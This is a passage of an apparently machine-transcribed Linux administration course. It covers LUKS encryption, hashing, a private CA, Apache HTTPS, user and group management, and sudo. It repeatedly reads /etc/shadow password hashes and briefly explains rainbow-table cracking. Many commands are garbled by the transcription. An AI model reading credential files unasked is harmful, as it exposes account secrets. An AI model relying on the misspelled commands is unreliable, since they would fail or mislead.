partition encryption in Linux. I'm going to use this tool. So I'll run sudo crypt setup lux format. Lux is spelled LUKS, and that stands for Linux Unified Key System. And the word format has a capital F, so lux format, one word. And I'll point to our new device, /dev/sde. Okay. I'm then given a warning. This will overwrite all of the data on that device. Are you sure? If you are, type yes in capital letters. That's what I'll do, and I'll press enter. So we're then prompted for a passphrase for dev SDE. We are creating the passphrase here. I'll go ahead and enter that, and then I'll verify it. Okay, then that part is done. So now what I'll do is unlock that partition. So sudo crypt setup lux open this time, open with the capital O. I'll point to my device /dev/SDE and I'll specify crypt part for the partition. I'll press enter. So we're asked for the passphrase that we specified. So now that we've unlocked that partition, we can go ahead and do things like sudo make file system -t, let's say ext4 file system. But what we're going to point to here is /dev/mapper/ and we call it crypt part from our command up above. Enter. And it's done. Let's go ahead and make a directory here on the root of the file system. Let's call it vault. That's going to be our one point directory. Now let's run sudo mount /dev/mapper/crypt part, and we'll specify /vault to mount it into. So at this point, if we run an sudo mount and grep it, let's say just for the word vault, our encrypted file system is now up and mounted. Now, while individual file encryption will protect encrypted files until they're decrypted within the session, the purpose of encrypting an entire disk partition is for protection of data at rest before it's mounted. Once it's mounted, then within that session, you can access all of the files in it. But the great thing about it is that files created within that partition will be automatically encrypted. So that gives us a general idea then of how to work with individual file encryption in Linux and disk partition encryption. Detecting changes to files can be important for a number of reasons. One of those reasons might be to make sure that a file's not corrupt, that a file that you copied or downloaded is the same as the original at the bit binary level. Or you might want to be able to detect changes perhaps made by unauthorized users. Either way, we're going to take a look at how to generate file system hashes in a Linux environment. The first thing I'm going to do here on my Linux host is type ls. In my current directory, I've got a file called project_a.txt. If I cat the project_a.txt file, it's got some text that says this is sample text for project A. Now, there are a number of different types of hashing algorithms out there. The purpose of hashing algorithms is to bring in original data, feed it into the hashing algorithm, which is called a one-way algorithm because it can't be reversed, and there are no keys required like there would be with encryption, whether they be symmetric or asymmetric public and private key pairs. With hashing, you feed the data through the algorithm, and the result is a fixed-length hash or message digest. So regardless of the size of the data you input, the size of the hash or the message digest is always the same. Now, of course, different hashing algorithms result in a different sized message digest. So as an example, if I were to do sudo md5 sum, and let's run that against project_a.txt, we get a unique hash value shown here based on the old message digest or md5 sum command. However, MD5 hashes are not used as frequently as the secure hash algorithm or SHA, S-H-A. Notice if I run sudo SHA-256 sum against our project.a.txt file, it's the same file, but we get a different returned hash value, just as we would if we used SHA-512 sum. But let's clear the screen. Let's go back to our SHA-256 sum. Notice the value here begins with E9AA. Let's make a quick change to the project_a.txt file, run a SHA-256 sum against it, and see what we get. So sudo nano, let's open up that project_a.txt file. I'm going to add some new text here, and I'm going to save that out to the file. And I'll use the up arrow key to go back to where we can run our SHA-256 sum of the project.a.txt file. Notice that we get a different hash value. That, of course, is because the file has changed. That's the purpose here, whether you want to detect corruption in terms of changes or you just want to know that a modification has been made to a file. Now, the other thing that's interesting here is user passwords for local Linux user accounts because they are hashed. For example, if I were to run sudo tail /etc/password, PSSWD. Now, it doesn't contain passwords these days, but it's just a user account file. Notice we've got a user here, mbishop, but the password is not here. Instead, if we do an sudo tail of /etc/shadow, then here for user mbishop, the second field, and each field here is denoted with a full colon delimiter, but the second field here contains a hash of the password for mbishop. Now remember, hashing algorithms are used as one-way functions. In other words, you can't reverse it. We can't take that hash and somehow reverse engineer it to the original source data, where with encryption, you can decrypt the ciphertext to reveal the plain text, given that you have the correct key. Can't do that with hashing. But from a security aspect, there is this notion of rainbow tables, which are enormous lists of resultant hash values from known plain text that can be compared. For example, if we know the password for mbishop is Apple, and it results in this hash value when fed into a particular hashing algorithm, then that would be one possible way from a cybersecurity standpoint that hashes can be cracked. These days, though, most algorithms that hash a value to result in that message digest will use a feature called salting, which means it uses some kind of random data that gets generated when you set things like a password. And in this way, it makes it very difficult, if not impossible, to try to crack password hashes using rainbow tables. And remember, because there's no keys involved, you don't have to worry about keys being compromised or anything like that to result in letting malicious actors into a system because they've somehow determined what a password hash value is. The last thing we'll do here is just take a quick look at a sample script I've got here called hashscript.sh. If we were to run, let's say, sudo nano against that, just to open up that file, this is a simple shell script where we're creating a couple of variables, one for the day of the month, one for the year, one for the month itself. For example, the day variable equals, and this is all within backticks, not single quotes. We're running the date command. We're asking just for the date portion, storing it in the day variable. Respectively, the same type of thing is happening to gather the year and storing it in the year variable, and the month and storing it in the month variable. Then we're echoing some text, and then we are putting together our month, day, and year variables, basically so we have a date stamp, and we are appending with the two greater than signs to a file called file_hash_history.txt. And what we're doing in this file is we're running SHA-512 sum of a file, a sample file I have in the current directory called file1.txt. We keep appending it to our file hash history file. And then we echo a new line character for spacing. What we're doing here in this script is essentially hashing a file and formatting the output a little bit and writing it to a file. So we have a running list of hashes of a file over time so we can detect changes. Let's see this in action. So if I were to cat file1.txt, it has the word testing in it. Let's run our local script here. So /current directory, hashscript.sh. That should result in a file called file_hash_history.txt. So if we take a look at that, okay, it says SHA-512 hash value. Here's the date stamp, and we've got a hash here for file1.txt. You might schedule this as a cron job, perhaps, and have it run once or more daily, or whatever the case might be. But let's go in and make a change to file1. So sudo nano file1.txt. I'll just add a new line here, save that to the file, and let's just go ahead and run our script again, /hashscript. And let's go back in our command history and cat our file hash history file. Now we have a new hash value, same date, but the hash value is different, of course, because the file contents have changed. So this just gives us a little idea of how we might use hashing along with the script to track file changes over time. In this demo, I will be deploying a private CA. So we know then that a CA, or a certificate authority, is the topmost part of the PKI hierarchy. At least if it's a root CA, it is. Under which we can create subordinate CAs and then have them issue certificates, or the root CA itself could also issue PKI certificates, whether for users, for devices, whatever the case might be. Now, setting up a private CA is sometimes advisable when you need full ultimate control and flexibility in how PKI is used and how it's set up. So to get started here, I'm going to run sudo apt install, and I'm going to be installing the easy-rsa product. There are plenty of crypto solutions out there for PKI hierarchies that you can run. In this case, we're installing easy-rsa. It asks, do you want to continue? I'll type in the letter Y for yes. Here in my home directory, I'm going to make a directory called easy-rsa. If I do an ls, there it is, easy-rsa. So what I'm doing here is I want to create a link. I'm going to run sudo ln for link -s, a symbolic link to usr/share/easy-rsa/*, and I want that to be put into my /easy-rsa folder. enter. So now in my home directory here, if I change directory to EasyRSA and do an ls, we've got a bunch of symbolic links to the files that really live in /usr share EasyRSA. You don't have to do it this way, but this is a benefit in that if software updates are applied to EasyRSA on this host, then our references in our home directory will reflect those software updates if any changes happen to apply to these files. I'm going to run sudo chmod 700 to give all permissions read, write, and execute to the file owners. If I do a long listing or ll, my symbolic links are shown here with the owner of root. Then, of course, we can run sudo change owner -R for recursive to C Blackwell for the PKI directory. Okay, so in my EasyRSA folder, I'm going to run /easy-rsa. If I do an ls in here, notice that we've got an EasyRSA file. If I cat EasyRSA, it is a script. Okay, it gives me a warning here that we are about to initialize a fresh PKI, a public key infrastructure. Type the word yes to continue. Okay, I'll type in yes and press enter. Okay, at this point, it says you may now create a CA or requests. And you've got a new PKI directory in /PKI underneath EasyRSA. And it also says that the vars file has been moved to PKI. Okay, so if I change directory into PKI and do an ls, notice indeed we do have a vars file here. What we want to do is run sudo nano against the vars file. And as I scroll down in this file, I've got a bunch of lines commented out for things like the country. So I'm going to set that to the 2-character code for Canada, CA. And I'll set all of these other variable values accordingly for the province, for the city, the organization, the admin email, and the OU. I'll press Control X. I'll save this file. So back here in the EasyRSA directory, I'll run ./easyrsa space build-ca, which will look at the vars file to build our certificate authority. It wants us to enter a new CA key passphrase, and then it wants me to re-enter it. And for the private key, we'll enter in a passphrase and verify that passphrase. I'll then ask for the common name of this CA host. I'm going to put in Ubuntu CA, and I'll press enter. Okay, and that's it. So if I change directory to PKI once again, if we do an ls, we've now got our CA certificate file. And if I change directory into private, we've also got our ca.key file. Just like with the regular certificate created from the CA itself also has a public and a private key pair. Private key is used to digitally sign issued certificates. So it is crucial to safeguard the ca.key file. That's a private key file. Whereas the ca.cert file is the public key certificate. That's what you can distribute to clients to establish a chain of trust. So the trust certificates issued by the CA. We'll see how to generate certificate requests from a CA in another demo. But at this point, we have successfully configured our own private CA on our Linux host. In this demo, I'm going to go about acquiring a PKI certificate for a Linux host. In our example, let's assume that we need a PKI certificate for a web server stack. So we want to enable an HTTPS binding, so therefore we need a PKI certificate. You can acquire PKI certificates from public certificate authorities, public CAs, or private CAs. I've already got a private CA established, and it happens to be on this same server, but it certainly doesn't have to be on the same server where you will be requesting a certificate. But that's how it is in this particular configuration. So here in my server, for example, if I change directory into easy-rsa, and then change directory into PKI, and do an ls, I've got a CA certificate file here, ca.crt, which if I cat, is the public key certificate for my CA. If I were to go into the private directory under PKI and do an ls, here we've got the ca.key, the private key file, which is passphrase protected for my certificate authority. Now that doesn't have to be on the same server once again, but it happens to be here. From a client perspective that's going to request a certificate, we can do that using the OpenSSL utility. So sudo apt install OpenSSL. Now if it's already there, that's great. Otherwise, we would have to install it. Here in my home directory, I'm going to run make dir CSR for certificate signing request, and I'll change directory into that location. You don't have to create a subdirectory for this, but I'm just trying to be a little bit organized here. So I'm going to run OpenSSL gen RSA to generate an RSA public and private key pair, -out. I'm going to call it Ubuntu 1 server.sh. key. Then I'll run open SSL. Then I'll run open SSL req for request -new -key. We know our file is called ubuntu1server.key -out, and then I'm going to call the request file ubuntu1server.req. Then I'm prompted with the fact that I'm going to be asked for information that will be incorporated into my certificate request. So the country name, 2-character code for my certificate request. And this is the same type of thing that was done at the CA level to establish the CA. We aren't establishing a CA here. We're trying to request a certificate from a CA. For the common name, I'll put in www.quick24x7.com. Presumably that's what we'll be using this for, is for a website under that name. And I'll enter the admin's email address. I'll enter a challenge password. And I'll fill in the company name. Okay, if I do an ls, we've now got the Ubuntu One server request. So if we cat the Ubuntu One server.key file, this contains the private key. Remember, we generated an RSA key pair, which consists of a public and a private key that are both related to each other mathematically. If we were to cat the Ubuntu One server.req file, request file, this is actually the certificate request. So what you would then do is make sure that you get this request file to the CA server. That might be done through email, by submitting it in a web form, by copying it over the network, using secure copy. Whatever the case is, the CA needs this certificate signing request file. Now, because the server is also this same machine, it's already available here. So I'm going to go into my easy-rsa directory, which is where I'm running my CA stuff from. From there, I'll run /easyrsa, which is a script, import-req, of course that means import request, and that's back in my CSR directory, and I'm going to refer to my Ubuntu One server.request file, and I want the output to be called Ubuntu One server. Okay, I then get a message stating that the request has been successfully imported with the short name of Ubuntu One server, that's the last parameter I specified, on the command line. The next thing that the CA must do is, using its private key, it must digitally sign the certificate. So I'll run within my easy-rsa directory /easyrsa. Again, that's the script. That's part of the CA software I'm using. Sign-req to sign the request. And the server is Ubuntu One server. Now notice, it says you're about to sign the following certificate. And here down below, we have the original certificate signing request details. The country name, the state or province, the locality, and so on. It says, type the word yes to continue. Okay, I'll type the word yes to continue. It wants me to enter that passphrase for the CA key. This would have been specified when I originally established the CA. Now, this is important because that's the private key of the CA, which is used to create the digital signature to validate the certificate it is issuing. Okay, then it says the certificate is to be certified until, and we've got a date and timestamp at which time it will expire. So it's good for a little over 2 years. And it says our certificate was created at, and we've got a path and name of a file. So if I change directory to PKI, change directory to issued, because it's an issued certificate, there is the Ubuntu One server.crt file. So that's an example at the command line on a Linux host of how you might acquire a PKI certificate from a private CA. In this demo, I will be configuring an HTTPS binding for a web server. Specifically, here on Ubuntu Linux, I'll be using the Apache 2 web server, and I've already acquired a PKI certificate for use with the server from a private CA. Let's examine some of the prerequisites here first. First thing I want to do is run sudo apt install Apache 2. Now, this means that the Apache web server is already installed, so we can verify this with sudo service Apache 2 status. And notice that the Apache HTTP web server is showing as active and running. If I do an IP space A, I know my private IP address here on this web server is 10.0.0.4. So if I were to run the curl command and specify http://, here I've just got the IP address of the server, and I know it's configured currently to listen on TCP port 82. Okay, so we got the returned HTML, so we know then that the server is up and running. What we want to do is have it listening on port 443 for HTTPS connections. So on this server, if I were to change directory to easy-rsa/pki/issued and do an ls, here we've got a certificate called Ubuntu One server.crt. If we were to cat that file, then up at the top, we have the issuer here showing us CN, or common name, equals Ubuntu CA. We've got the certificate validity of when it is valid and when it expires. And we've got the subject details here, including the common name of the server, which is set here in the certificate to www.quick24x7.com. So your server has to be configured to use that, and DNS A or Quad A records must resolve to the IP of this server. Basically, when people connect to the website, the name in the certificate has to match what they're connecting to. Notice as I go down further and look at the extended key usage for this certificate, it says TLS Web Server Authentication, among other things. And again, the DNS subject alternative name is showing as www.quick24x7.com. Okay. And then we've got the certificate details here. So what we should now do is run sudo nano/etc/hosts. If you're using DNS, modify DNS. But I'm just going to go ahead and pop in here the private IPv4 address, followed by www.quick24x7.com, and I'll save that out. So therefore, if I were to go back in my command history, I should be able to go back to my curl command and replace the IP address with www.quick24x7.com. Again, still on port 82 currently, and it's still working. Okay, well, we know the name has to match what's in the certificate when we enable our HTTPS binding. So that's been done now. So now I'm going to run sudo make dir/etc. Let's say we're going to make a directory here called certificate. And I'm going to run sudo cp to copy my Ubuntu server certificate to /etc/certificate. And I'm going to change directory to where I know I've got the certificate signing request or CSR for my Ubuntu server. Here I've got the private key for the server. If I cat my Ubuntu one server.key file, it's the private key. Well, that also has to be present with the certificate on the web server. So I'm going to run sudo cp, and I'm going to copy my Ubuntu one server.key file, that's the private key file, to /etc/certificate. Now, if we do an ls of etc certificate, we've got the server certificate and we've got the server's private key. Perfect. So now what we need to do is make sure the SSL module is enabled for the Apache web server. We can do that by running sudo a2enmod enable module and SSL. If it's already enabled, it will tell us down below, otherwise it will enable it. At the same time, we should also run sudo a2enmod enable module rewrite to rewrite connections, let's say from port 80 to port 443, if we want to do that. After which we should restart the Apache web server. We can do that in a couple of ways, one of which is sudo service apache 2 restart. Okay, no errors, and we'll just check the status here. Looks like it's active and running. However, we should also modify our web server conf file so it knows to listen on port 443. It knows to use SSL. It knows where the certificate is and the server's private key. So for that, I'm going to run sudo nano, and I want to connect to /etc/apache2/sites-enabled/ and I want to get into the file called 000-default.conf, or whatever the main config file is for your website. In the virtual host block on the top, I want to make sure I've got :443, which is the standard HTTPS listening port. And I want to make sure down below I've got the SSL engine directive. There's no spaces between those two words. And I want to make sure it's set to on. I want to then make sure I've got the SSL certificate file directive. Again, no spaces between those three words. And I want to make sure it points to the correct location of my server's certificate file, which normally ends with the .crt file extension. And then I want to make sure I have the SSL certificate key file directive, no spaces between those words, and make sure it's pointing to the correct path and name of my web server private key file. Let's just get out of that file. Whenever you make changes to config files for Apache, you might want to run sudo apache 2ctl-config test. Okay, the syntax is okay. That's great news. Otherwise, we would have to correct any syntax errors before moving on. Now, when you make changes to config files, you should, of course, always restart the appropriate service, in this case for Apache 2. So what we need to do is copy the CA certificate on this machine so that this machine trusts the certificates that that private CA has issued. Now, this server, which is our Apache web server, also is the server where I created the CA, so it's very easy for us to copy the file. I'm going to run sudo cp to copy. I'm going to specify the path and file name of that file, and I'm going to copy it into the current directory dot. I've changed directory to /usr/local/share/ca-certificates. On Ubuntu Linux, that's where your trusted CA certificates have to go. After that, though, I have to do something else. I need to run the sudo update -ca-certificates command. So it will read that location, see any new certificates that we've added, configure it so that this machine then trusts certificates from that CA. And so if we go back to our curl command where we're connecting over HTTPS to our DNS name, now it returns the HTML for that web page instead of returning the error about not trusting the issuer of the certificate. So there you have it. We've successfully enabled an HTTPS binding for the Apache web server. Let's take a few minutes to talk about how to work with user accounts in Linux. Now, certainly we'll be focusing most of our time doing that at the command line, but let's begin for a moment using Ubuntu Desktop as our GUI example so that we can get a sense of what it might look and feel like if we're going to use a graphical environment to manage Linux user accounts. So here at Ubuntu Desktop, I'm going to start by opening up my menu from the bar on the left, and I'll search for the word user. And here in our settings, we've got something here shown as users. Add or remove users and change your password. Okay, I'll click on that. So the first thing it shows me is who I am signed in as right now, which is a user by the name of Cody Blackwell. And if I were to click on password, this is where I would have the option of changing my password, given that I know my current password, but I'll cancel out of that. And if I click account activity, it conveniently just shows me the account activity for the account I'm signed in with now, in terms of when the session started and when the session ended. But at the top here, I can click the unlock button if I want to work with additional user accounts. That's similar to having to run sudo before you use Linux commands to manage user accounts, commands like user add, user mod, user del. So if I were to click unlock, I'll enter the password for this account, Cody Blackwell, because what I'm really doing is taking advantage of my sudo elevated permission set. And once I've done that, I then have the ability to click add user and to add a user account. So I'll enter in the full name. It'll automatically generate the short name. And this is just going to be a standard user, not an administrative type of user. I'll leave it on the default to allow the user to set a password when they next log in. And that's it. I'll just click add, and it's done. So now notice that we've got two accounts shown at the top here in this GUI, Lucas Brenner and Cody Blackwell. Depending on the Linux distribution you're using and the desktop manager will really determine what this interface looks like, but they're pretty easy to navigate through. But let's go to the command line. Okay, so here at the command line, I'm going to start by running sudo user add-m. M meaning I want to create a home directory for the user. The user I will create will have a login name of jgold, and if I use lowercase g, I can determine the primary group that that user is a member of. Let's say it's called East Admins. Notice, if that group does not exist, you will get an error message. So it will not create the group as you're creating the user. So for that, I could run sudo group add East Admins. Then if I use the up arrow key to go back to our user add command, it succeeds. If we tail /etc password, we'll have a reference here for user jgold. Notice it also assigned a unique user ID for the user account. It created a home directory because we specified -m under /home/jgold. And notice the default shell is set to /bin/sh. Now we haven't set a password for that account. So normally what we would do is run sudo password, PSSWD, this case for jgold, and we'd specify and confirm the password for that account. And then we'll get a returned message about the password having been updated successfully. So if we were to run sudo tail of /etc/shadow, there's jgold, and in the second field, the delimiter is a full colon, we've got a hash of the user password. Now, of course, this is when you're working with a local Linux account. If you're using with a cloud-based directory service that uses a centralized list of user accounts, naturally everything is completely different. Just like it would be if, let's say, you were working with OpenLDAP to have a centralized network directory server containing user accounts, and then installing the LDAP client on client devices to authenticate through that central directory. The method by which you would configure those user accounts would differ from what we are doing here, and we'll see how to configure LDAP a little bit later. Now let me do a long listing of /scripts, which is a subdirectory that I have created, and I created a file in there called script1.sh. Notice the permissions here are read, write, and execute for the owner, which is being shown here as user root. Now, of course, an important part of managing users in Linux is understanding ownership. So if I were to run sudo change owner, chown is the command, I want to change to the owner, jgold in our example, and it's going to be for the file in /scripts, and the file is called script1sh. Now, if we do an ll of /scripts, of course, the owning user of this file is now showing as jgold, which means now jgold has the read, write, and execute permissions for that particular script. Now let's also create a group here, group add, sudo group add, called Linux admins. So what I want to do is add user jgold to that group as an additional group. You might recall that if we do a tail of /etc/password, there's jgold, but there's no reference here specifically to the groups that user is a member of. If we were to do an sudo tail of /etc/shadow, there's not a reference there either. So therefore, if we do an sudo tail of /etc/group, notice what we have here is a list of group names. The second field is whether or not there's a group password, but the third one, of course, is the group ID. For example, EastAdmins has a group ID of 1002. If we were to tail once again, /etc/password, notice that jgold in the third column has 1002, the user ID, but the next occurrence of that happens to be the group ID. Let me show you what I mean. If I were to run sudo user mod for user, let's say jgold -g Linux admin, so I'm changing the primary group for jgold. Now remember, the jgold listing in etc password had two occurrences of IDs 1002, but we've just changed the primary group. So now if we, once again, tail etc password, notice that the second occurrence of what used to be 1002 is now 1003. You might also recall, if we do an sudo tail of /etc/group, that Linux admins has an ID of 1003. So that's the link, then, between groups and users. Now, of course, it's also important to know that we can switch to different users if we're already signed into a Linux session of somebody else using the switch user command su. If I do an su-jgold, the dash means perform a full login and run any scripts and whatnot for jgold, prompted for that person's password, and then I'm in as that user. We can verify this in a couple of ways. For example, if I type ID, it's returning that I'm signed in currently as user jgold with an ID of 1002. Primary group ID is Linux admins. Group ID of that group is 1003. And there might be some additional groups that this user is a member of as well. So that gives us an idea then of how we would do basic Linux user administration. The last thing we'll do here, I'll just exit out of that session, is run sudo user del jgold. It's that easy to remove a user account. So now if I do sudo tail of /etc/password, notice the absence of user jgold. In this demo, we'll be taking a look at how to manage Linux groups from the command line. So the first thing we'll do here is just quickly take a look at the etc group file. So sudo tail, I'll just do the tail end of it, /etc/group, enter. What we have here is a list of groups such as Puppet. The second field will contain just a lowercase x. In the past, that was something that was done rarely, even then, where you could have a group password. But following that, we then have the ID of the group. For example, notice we have a user here, C Blackwell. That's actually a group name. Normally, in most Linux distributions these days, when you create a user, you also get a group with the same name. So we have a group called C Blackwell with an ID of 1001. If we were to run sudo cat /etc/password and grep that for C Blackwell, notice that the C Blackwell user account has an ID of 1000, but in the next field, we have 1001, which corresponds to the primary group that user belongs to. However, of course, we can change all of that. Let's start by creating a new group. I'm going to run the group add command, prefixed with sudo, of course, and I'm going to call this group Linux admins. So if we clear the screen and if we tail the etc group file, once again, there's Linux admins with an ID of 1003. One of the things that we can do is we can either upon creation assign a user to a group or change it at any point thereafter. For example, let's run sudo user add -m to create a home directory, -g, and let's assign them right away to the Linux admins group. Now notice these are lowercase letters, -m and -g. We're going to create user jgold. I'll press enter. So first things first, let's do a cat of /etc password and let's grep this time for jgold. So jgold is shown here. The user has an ID of 1002, but we have 1003 shown here for the group identifier. And if we tail /etc/group, of course, 1003 is the ID of the Linux admins group. But we could change user membership in a group after the fact as well. First of all, let's add a new group. sudo group add East admins. sudo user mod. So instead of user add user mod, dash lowercase g East admins, and again, that'll be for J Gold. So now, if we take a look at etc password, specifically the J Gold line, notice now the group ID is showing as 1004. And if we tail /etc/group, of course, as you might expect, that would be a reference to the group East admins. But can't a user be a member of more than one group? Yes, there's the primary group, but then there are additional groups. For example, let's add yet another group. sudo group add full-timers. Okay, what I can do is run usermod-a for append, because what I want to do is not modify existing group memberships for the user, but simply add additional groups. But I'm going to use a capital G because I don't want to change the primary group that the user is a member of, just additional or supplementary groups. Then I can have a comma-separated list of groups, such as Linux admins, comma, full-timers, and then user, J Gold. Of course, we've got to prefix that with sudo, so we have the correct elevated permissions to do that. However, if we were to do a cat of etc password again for J Gold, only their primary group ID shows up here, 1004. Bear in mind here while we're looking at this that J Gold's user ID is 1002. So if I tail /etc group, notice that in our group listing for Linux admins and full-timers, in the fourth field, user J Gold is shown as a member of both of those groups. Now we can also modify some attributes of a group, such as its name, sudo group mod-n, and the new name is going to be full-time employees, and the old name, of course, is full-timers. And if we tail etc group, of course, now the group has been renamed to full-time employees. We can also remove members from a group. If I do sudo gpassword, spelled passwd, -d, let's say we want to delete or remove J Gold from the full-time employees group. Okay, it says it did it, but we can only prove that if we tail etc group again. Indeed, it appears that J Gold has been removed from the full-time employees group. The last thing we'll do here is just mention that we can remove groups in their entirety using sudo group del, and then by specifying the name of the group. So if I want to delete the full-time employees group, I can do that with group del. If we tail etc group, the full-time employees group indeed has been deleted. In this demo, we're going to take a look at how to work with Linux user configuration files. Now you might be wondering, what does that mean exactly? Well, it is kind of a broad subject. So we're going to take a look at some user config files in terms of where local Linux user accounts exist, group definitions. We'll take a look at some locations in the file system where you can actually populate subdirectories with files that will be copied to the home directory automatically of newly created users. So that's the type of thing that we're going to take a look at. So let's start here, first of all, in Linux by running an sudo tail of /etc/password. Of course, that's spelled passwd. This is the user account file for local Linux accounts. The reason I keep saying local Linux accounts is you can configure your Linux host to authenticate users where those user accounts exist elsewhere, like in a centralized LDAP server directory, or even in a cloud-based directory service. So with local Linux user accounts, the account information is stored in the password file. Now we've seen this a few times. We know that it starts with the username followed by an X in the second position, which really just means that the password hash for that account, if there is a password, is in the /etc/shadow file, which we'll take a look at. We then have the ID of the user, in this case for user J Gold, the ID is 1002, and we also have the ID of the primary group that that user is a member of. Now, what does primary group mean? Well, let's explore this just a little bit further, and this would be part of our talk about user configuration files. If we do an sudo tail of /etc/group that's singular, notice that the group with an ID of 1004 is East admins. But also notice here in the group file, user J Gold is a member of an additional group called Linux admins, which has an ID of 1003. But that's not reflected up here in the password file for J Gold's account information. Only the primary group, ID 1004 EastAdmins, is showing here. So I keep saying primary group. What does that mean? Best explained through a quick demonstration. Let's do this. Let's do an SU space dash to do a full login to run all login scripts for a user, and we'll connect as jgold. So all we're doing is switching to that user account temporarily in a shell. So I'm prompted for the password for jgold. I'll put it in. Okay, so we're currently signed in now as jgold. If I type pwd, print working directory, we are in /home/jgold. Now, if you're wondering, why does the command prompt only look like a $? It's just using a standard shell instead of a full bash shell. But we'll talk about that in just a moment. What I'd like to do is simply touch a new file. Let's create a new file here in jgold's home directory called file1.txt. I'll just do that with the touch command. If we do a long listing, ll, notice it doesn't work here. Well, that's more of a bash thing, but if we do an ls-l, that does work. Well, what I want to point out is simply this. When jgold is signed in and creates a file, jgold, of course, is set as the owning user and gets the user set of permissions, and the primary group, here's the primary group thing, for that user account is shown as the group owner of the file, which would get the group permissions, in this case, just read. So whoever else is a member of EastAdmins would also have read. And everyone else, of course, would only have read as well. We know that that can be changed with the chmod command, but the point is that the primary group is important, although a user can be a member of multiple groups, as we have seen. Let's get out of this shell. Exit. We're back in as cblackwell. What I like to do once again is just go to sudo tail of /etc/password once again. Of course, when we sign in as jgold, notice that we have /bin/sh. That's why we had a weird shell. Well, can we change that? Certainly. sudo nano /etc/password. What I'd like to do is modify it such that user jgold has a standard bash prompt, kind of like cblackwell does up here. Notice cblackwell's account in the last field here is defined as having a shell that will start called /bin/bash. Okay, well, in the bin directory, why don't we refer to the bash binary here for jgold as well? We'll save that out. Let's do an su dash of jgold and go back in again as that account. And of course, now we have a standard command prompt. Remember how ll wouldn't work with just a normal shell sh? If I type ll now, works just fine because we're in a bash shell. As we know, that's one of the subtle differences that you will find when you're using different types of shells to manage a Linux host. If I do an sudo of tail /etc/shadow, of course, we know that this is, so I'm going to exit out of that and go back to cblackwell where I'll run sudo tail of /etc/shadow. We know, of course, this works in conjunction with the /etc/password file. So here's jgold's account. And of course, we've got a hash of the password in the second field, all the way down to the next colon. Notice if I were to do an sudo password, so passwd-l, to lock out an account so it can't be logged in with, for jgold, it says the password was changed. Well, password was changed. Notice currently in our previous screen output for jgold here in the shadow file, that the password starts with $Y, $J, well, I should say the password hash starts with those characters. If we were to tail that file again, notice that the first character in jgold's password hash is now showing as an exclamation mark. That means that that account cannot be logged into. It's been locked. You might do that, of course, for some kind of security reason, or if the person is on extended leave or on some kind of a sabbatical. But what we can also do is turn it back on. We can run sudo password passwd-u, as you might guess, to unlock the account, and then we specify the username, jgold. Okay, it says password changed. Let's tail etc shadow again, and we're back in business. There's no longer an exclamation mark at the beginning of jgold's password hash, which means that user can sign in. Let's change directory to /etc/skel, S-K-E-L, as in skeleton. If I do an ls, there's nothing in here. But what we can do is we can place files in here that we would like copied automatically to the home directory of newly created users. That can be incredibly convenient. For example, let's create a sample file here. I'll use the touch command to do that. I'll have to prefix it with sudo, of course, and we're going to call it expense template.let's say xlt. If we do an ls, there's the expense template.xlt. Let's do another one. sudo touch vacation request .docx. So this is just an example, but if we do an ls, we have these two files in /etc/skel. Let's create a new user account to see what happens. sudo user add -m to create a home directory. And let's say we'll create user C Jackson. Okay, it's been done. If I do an ls of /home/C Jackson, of course I get a permission denied because I'm not logged in as root. If we do an sudo in front of that, notice the files that were copied to C Jackson's home account automatically, the expense template and the vacation request. So having an understanding of how some of these user-based config files interact together can be important in managing a Linux system. In this demo, we're going to be working with the configuration of sudo. Some people pronounce that sudo, sudo. But the purpose of sudo is to have regular users that can run commands as a privileged user. So commands a user normally doesn't have permissions to run, it is possible to make that happen configuring sudo. So consider the following example. If I were to type in ID, it shows who I am currently logged in as. I am logged in as a user called C Blackwell. So in other words, I am not logged in with the root super user account, and therefore there will be limitations on what I can do signed in as this account. Consider, for instance, if I type fdisk-l, I get a bunch of permission denieds when it tries to access devices in the /dev subdirectory structure. So it's all permission denied. However, if I clear the screen and run sudo as a prefix in front of it, and then issue my command that requires elevated permissions, so sudo fdisk-l, this time it works spectacularly. And that's because user C Blackwell is set up to be allowed to run some or perhaps all privileged commands. It really depends on how sudo is configured, and that's precisely what we're going to examine. But this is important because from a security perspective, we do not want to be signed in with the root super account all of the time. That is a bad security practice, in case we might inadvertently cause problems on the system or delete important files. The other thing that's great about it is you don't want a bunch of Linux technicians all signing in as root because then there's no accountability. How do you know who did what exactly? It's better if admins have their own accounts and then use sudo to run privileged commands. Then we have a track record of who did what, when, and where. So let's take a look at the infrastructure or the supporting files, the configuration files for sudo. So I'm going to run sudo cat/etc/sudo.conf, and we'll pipe that to more. I'll press enter. Okay. You'll notice that this file has a bunch of comments. Now, we're not really going to make any changes here, and normally technicians probably wouldn't come in here to make changes. However, it is a config file related to sudo, but that's not really where we would do the bulk of any configuration work related to this. Let's do an sudo cat of /etc/sudoers. The sudoers file will list some configurations for who is allowed to do what. What's very important here is understanding this syntax. Let's break this down for just a moment here. We've got a line in the sudoers file that begins with the word or the name root. Well, what does that mean? Well, that is the user to which we would like to grant privileges. It could be any user account name. It might also be a group name if you prefix it with a % symbol. Then we have the word all. This first occurrence of the word all in this particular case means from which host should we allow this user to enter these commands. All, of course, means all hosts. Now, you can specify host names. You can specify IP addresses. You could specify a subnet, let's say, with a CIDR range notation. After that, we have equals, and in parentheses, we have all, : all. Well, the next all, before the colon to the left of it, refers to the target run as user on the host that the commands will be run as. A user, to be able to run privileged commands as a specific other user, you can specify that other username here. After the colon, we have another all here, still in the parentheses. That would be for the target run as group. It's kind of like in Windows where you can run something as somebody else. That's what you're specifying here. The last occurrence of the word all here in the sudoers file is which commands can be run by the user listed in the first column on the left. In this case, it's all commands, but you can have a comma-separated list of commands. Now, that's nice to say, but how does this behave? Let's do an example. I'm going to clear the screen. When you want to make changes to sudoers, what you should be doing is running sudo visudo. What that will do is it will let us edit the sudoers file. Even notice at the top, though, here, it says we're modifying the sudoers.tmp, but this is how it's done. One of the first comments at the top states, this file must be edited with the visudo command as root. So there's some default settings being established here at the top of this file. And finally, down below, we have a user privilege specification section. There's also an include_dir directive to include whatever content is within the /etc/sudoers.d file. However, here I'm just going to add a line under root. What I want to do is make sure that user jgold can run fdisk. So I'm going to add jgold from any host, so all equals, and in parentheses, I'll put in all. I don't have to put in all:all. I just want the run as target user on hosts to be any user that a binary that is being executed by jgold runs as. Then I can specify the path and name of the binary I want to allow access to for user jgold. So I'll specify /usr/sbin/fdisk since that is where the binary actually lives. Let's press Ctrl X to save this. Now be careful. If there's a syntax error in here, then you might have problems trying to run commands with sudo that require elevated privileges. Okay, save modified buffer. Yes. And here we go. So if I go back to sudo cat of /etc/sudoers, notice it wrote to this file from 